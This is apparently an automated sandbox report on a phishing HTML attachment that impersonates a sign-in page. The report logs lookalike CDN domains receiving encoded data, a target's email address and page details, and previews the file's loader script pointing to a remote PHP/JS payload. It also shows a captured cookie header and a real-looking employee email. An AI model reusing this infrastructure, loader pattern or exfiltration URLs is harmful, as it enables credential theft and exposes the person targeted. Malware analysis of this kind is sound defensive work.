    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: November Draw Disbursed.htmlString found in binary or memory: https://descansonline.com/wp/b1.js
    Source: November Draw Disbursed.htmlString found in binary or memory: https://descansonline.com/wp/b1.php
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
    Source: unknownHTTPS traffic detected: 162.19.88.68:443 -> 192.168.2.3:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.172.153.55:443 -> 192.168.2.3:49743 version: TLS 1.2
    Source: classification engineClassification label: mal56.phis.winHTML@27/0@16/13
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\November Draw Disbursed.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath Interception1
    Process Injection    		2
    Masquerading    		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection    		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
    Non-Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
    Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
    Ingress Tool Transfer    		SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    descansonline.com0%VirustotalBrowse
    i.postimg.cc0%VirustotalBrowse
    code.jquery.quest0%VirustotalBrowse
    maxcdn.bootstrapcdn.rest0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://maxcdn.bootstrapcdn.cloud/ndata/index.php?dt=wendy.lang@dmv.ca.gov0%Avira URL Cloudsafe
    https://descansonline.com/wp/b1.js0%Avira URL Cloudsafe
    https://maxcdn.bootstrapcdn.cloud/catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,4100%Avira URL Cloudsafe
    https://maxcdn.bootstrapcdn.cloud/tkv/index.php?dt=QCPsVcn7rgD1hKIR25CTCLE0O0%Avira URL Cloudsafe
    https://maxcdn.bootstrapcdn.cloud/post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerland0%Avira URL Cloudsafe
    https://code.jquery.com.de/ip.php0%Avira URL Cloudsafe
    https://i.postimg.cc/jSY8DXQL/back.jpg0%Avira URL Cloudsafe
    https://code.jquery.quest/jquery-3.5.2.min.js0%Avira URL Cloudsafe
    https://code.jquery.com.de/jquery-3.5.2.min.js0%Avira URL Cloudsafe
    https://descansonline.com/wp/b1.php0%Avira URL Cloudsafe
    https://aadcdn.msauthimages.net/dbd5a2dd-us0mikl89yxon-sgdcnggg1-x8-vglc85xxjmtn1cza/logintenantbranding/0/bannerlogo?ts=6372275552104616810%Avira URL Cloudsafe
    https://maxcdn.bootstrapcdn.rest/jquery-3.5.2.min.js0%Avira URL Cloudsafe
    https://maxcdn.bootstrapcdn.cloud/jquery-3.5.2.min.js0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    descansonline.com
    		188.114.96.3
    		truefalseunknown
    d26p066pn2w0s0.cloudfront.net
    		18.172.153.55
    		truefalse
      		high
      accounts.google.com
      		172.217.168.45
      		truefalse
        		high
        i.postimg.cc
        		162.19.88.68
        		truefalseunknown
        www.google.com
        		172.217.168.68
        		truefalse
          		high
          code.jquery.quest
          		38.34.185.163
          		truefalseunknown
          clients.l.google.com
          		142.250.203.110
          		truefalse
            		high
            maxcdn.bootstrapcdn.rest
            		172.67.188.128
            		truefalseunknown
            code.jquery.com.de
            		38.34.185.163
            		truefalse
              		unknown
              cs1025.wpc.upsiloncdn.net
              		152.199.23.72
              		truefalse
                		unknown
                maxcdn.bootstrapcdn.cloud
                		68.65.123.205
                		truefalse
                  		unknown
                  aadcdn.msauthimages.net
                  		unknown
                  		unknownfalse
                    		unknown
                    clients2.google.com
                    		unknown
                    		unknownfalse
                      		high
                      logo.clearbit.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlfalse
                          		low
                          https://maxcdn.bootstrapcdn.cloud/catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410false
                          • Avira URL Cloud: safe
                          		unknown
                          https://i.postimg.cc/jSY8DXQL/back.jpgfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://descansonline.com/wp/b1.jsfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://code.jquery.com.de/ip.phpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                            		high
                            https://code.jquery.com.de/jquery-3.5.2.min.jsfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://code.jquery.quest/jquery-3.5.2.min.jsfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                              		high
                              https://maxcdn.bootstrapcdn.cloud/post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerlandfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://maxcdn.bootstrapcdn.cloud/ndata/index.php?dt=wendy.lang@dmv.ca.govfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://maxcdn.bootstrapcdn.cloud/tkv/index.php?dt=QCPsVcn7rgD1hKIR25CTCLE0Ofalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://logo.clearbit.com/dmv.ca.govfalse
                                		high
                                https://maxcdn.bootstrapcdn.rest/jquery-3.5.2.min.jsfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aadcdn.msauthimages.net/dbd5a2dd-us0mikl89yxon-sgdcnggg1-x8-vglc85xxjmtn1cza/logintenantbranding/0/bannerlogo?ts=637227555210461681false
                                • Avira URL Cloud: safe
                                		unknown
                                https://maxcdn.bootstrapcdn.cloud/jquery-3.5.2.min.jsfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://descansonline.com/wp/b1.phpNovember Draw Disbursed.htmlfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                152.199.23.72
                                		cs1025.wpc.upsiloncdn.netUnited States
                                		15133EDGECASTUSfalse
                                68.65.123.205
                                		maxcdn.bootstrapcdn.cloudUnited States
                                		22612NAMECHEAP-NETUSfalse
                                162.19.88.68
                                		i.postimg.ccUnited States
                                		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                38.34.185.163
                                		code.jquery.questUnited States
                                		174COGENT-174USfalse
                                142.250.203.110
                                		clients.l.google.comUnited States
                                		15169GOOGLEUSfalse
                                18.172.153.55
                                		d26p066pn2w0s0.cloudfront.netUnited States
                                		3MIT-GATEWAYSUSfalse
                                172.217.168.68
                                		www.google.comUnited States
                                		15169GOOGLEUSfalse
                                172.217.168.45
                                		accounts.google.comUnited States
                                		15169GOOGLEUSfalse
                                239.255.255.250
                                		unknownReserved
                                		unknownunknownfalse
                                188.114.96.3
                                		descansonline.comEuropean Union
                                		13335CLOUDFLARENETUSfalse
                                172.67.188.128
                                		maxcdn.bootstrapcdn.restUnited States
                                		13335CLOUDFLARENETUSfalse

                                Private

                                IP
                                192.168.2.1
                                127.0.0.1

                                General Information

                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756202
                                Start date and time:2022-11-29 19:58:14 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 5m 42s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:November Draw Disbursed.html
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal56.phis.winHTML@27/0@16/13
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .html

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 172.217.168.67, 34.104.35.123
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, edgedl.me.gvt1.com, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, update.googleapis.com, clientservices.googleapis.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:HTML document, ASCII text, with CRLF line terminators
                                Entropy (8bit):5.340590656103303
                                TrID:
                                • HTML Application (8008/1) 100.00%
                                File name:November Draw Disbursed.html
                                File size:444
                                MD5:c0d6d8acc86ed388214581788ec837d8
                                SHA1:c846ee109e9ee8e373ff09412a59e3aeec06fd44
                                SHA256:2209177e77a2dabd0c034500ee64ccca71d8985c7c564ce31898ca2326bb6d78
                                SHA512:0ffdc4579cb9b2edee23f3a9fd5da4062a0285586c5395e2de19708b71024c6a3741397a5a10aa055d56d1e6a2c2b8e032f2e9584a8dbf554ce25c9242ca0279
                                SSDEEP:12:7KPA2JZoH3TuBVKHuHAHYoHcI4DMEGVdDVRxb:7CAuZoXKBcQAHYo8Istaxb
                                TLSH:C8F05C502C4C4A4005341E718078960DD01F492CDE8CC9C296D768562950FDE2ECA6C4
                                File Content Preview:<script>.. var Tse0sed5 = "https://descansonline.com/wp/b1.php"; // php file link normal or B64.. var RTse0dsqqs = "wendy.lang@dmv.ca.gov"; //email normal or B64.. var e0zs52658 = "https://descansonline.com/wp/b1.js"; //js file link normal or B64..

                                File Icon

                                Icon Hash:78d0a8cccc88c460

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.38.8.8.855638532027758 11/29/22-19:59:13.326192UDP2027758ET DNS Query for .cc TLD5563853192.168.2.38.8.8.8
                                192.168.2.38.8.8.853848532027758 11/29/22-19:59:15.999356UDP2027758ET DNS Query for .cc TLD5384853192.168.2.38.8.8.8

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 29, 2022 19:59:07.092547894 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:07.092595100 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:07.092681885 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:07.094491959 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:07.094507933 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:07.166402102 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:07.166858912 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:07.166901112 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:07.167536974 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:07.167625904 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:07.168848991 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:07.168930054 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:08.287462950 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:08.287523031 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.287798882 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.287830114 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:08.287846088 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.324126005 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.324261904 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:08.324322939 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.324359894 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.324426889 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:08.326643944 CET49698443192.168.2.3142.250.203.110
                                Nov 29, 2022 19:59:08.326693058 CET44349698142.250.203.110192.168.2.3
                                Nov 29, 2022 19:59:08.399707079 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.399802923 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.399893045 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.400326014 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.400360107 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.469950914 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.496452093 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.496521950 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.499883890 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.500020027 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.502785921 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.502815962 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.503006935 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.503032923 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.503046989 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.560476065 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.560601950 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.560652018 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.560854912 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:08.560923100 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.562552929 CET49700443192.168.2.3172.217.168.45
                                Nov 29, 2022 19:59:08.562591076 CET44349700172.217.168.45192.168.2.3
                                Nov 29, 2022 19:59:10.500958920 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.501024008 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.501147985 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.502063036 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.502099037 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.602175951 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.705908060 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.788549900 CET49701443192.168.2.3188.114.96.3
                                Nov 29, 2022 19:59:10.788599968 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.792459011 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.792560101 CET44349701188.114.96.3192.168.2.3
                                Nov 29, 2022 19:59:10.792576075 CET49701443192.168.2.3188.114.96.3
